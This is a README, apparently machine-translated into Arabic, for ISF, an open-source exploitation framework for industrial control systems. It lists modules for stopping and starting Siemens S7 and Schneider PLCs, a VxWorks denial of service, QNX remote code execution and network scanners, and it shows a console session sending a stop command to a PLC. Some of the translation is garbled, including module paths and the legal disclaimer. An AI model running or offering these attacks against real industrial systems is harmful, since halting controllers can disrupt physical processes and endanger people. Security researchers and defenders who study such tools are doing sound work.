isf
ve release
ISF (إطار الاستغلال الصناعي) هو إطار استغلال يعتمد على لغة Python، وهو مشابه لإطار عمل metasploit.
يعتمد ISF على مشروع مفتوح المصدر routersploit.
اقرأ هذا بلغات أخرى: الإنجليزية، 简体中文،
إن استخدام قوى الأمن الداخلي لمهاجمة الأهداف دون موافقة متبادلة مسبقة أمر غير قانوني. تقع على عاتق المستخدم النهائي مسؤولية الالتزام بجميع القوانين المحلية وقوانين الولاية والقوانين الفيدرالية المعمول بها. لا يتحمل المطورون أي مسؤولية وليسوا مسؤولين عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج.
اسم | طريق | وصف |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | عميل Modbus-TCP |
wdb2_client | icssploit/clients/wdb2_client.py | عميل WdbRPC الإصدار 2 (Vxworks 6.x) |
s7_client | icssploit/clients/s7_client.py | عميل s7comm (S7 300/400 PLC) |
اسم | طريق | وصف |
---|---|---|
s7_300_400_plc_control | استغلال/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC بدء/إيقاف |
s7_1200_plc_control | استغلال/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC بدء/إيقاف/إعادة ضبط |
vxworks_rpc_dos | استغلال/plcs/vxworks/vxworks_rpc_dos.py | نظام تشغيل Vxworks RPC عن بعد (CVE-2015-7599) |
quantum_140_plc_control | استغلال/plcs/schneider/quantum_140_plc_control.py | تشغيل/إيقاف سلسلة Schneider Quantum 140 PLC |
Crash_qnx_inetd_tcp_service | استغلال/plcs/qnx/crash_qnx_inetd_tcp_service.py | خدمة QNX Inetd TCP |
qconn_remote_exec | يستغل/plcs/qnx/qconn_remote_exec.py | تنفيذ التعليمات البرمجية عن بعد QNX qconn |
profinet_set_ip | استغلال/plcs/siemens/profinet_set_ip.py | تكوين IP لجهاز Profinet DCP |
اسم | طريق | وصف |
---|---|---|
profinet_dcp_scan | الماسحات الضوئية/profinet_dcp_scan.py | الماسح الضوئي Profinet DCP |
vxworks_6_scan | الماسحات الضوئية/vxworks_6_scan.py | الماسح الضوئي Vxworks 6.x |
s7comm_scan | الماسحات الضوئية/s7comm_scan.py | الماسح الضوئي S7comm |
enip_scan | الماسحات الضوئية/enip_scan.py | الماسح الضوئي إيثرنتيب |
يمكن استخدام هذا البروتوكول في إطار عمل Fuzzing آخر مثل Kitty أو إنشاء عميل خاص بك.
اسم | طريق | وصف |
---|---|---|
pn_dcp | icssploit/protocols/pn_dcp | بروتوكول Profinet DCP |
modbus_tcp | icssploit/protocols/modbus_tcp | بروتوكول مودبوس TCP |
wdbrpc2 | icssploit/البروتوكولات/wdbrpc2 | بروتوكول WDB RPC الإصدار 2 |
s7comm | icssploit/protocols/s7comm.py | بروتوكول S7comm |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
يمكنك استخدام مفتاح tab للإكمال.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >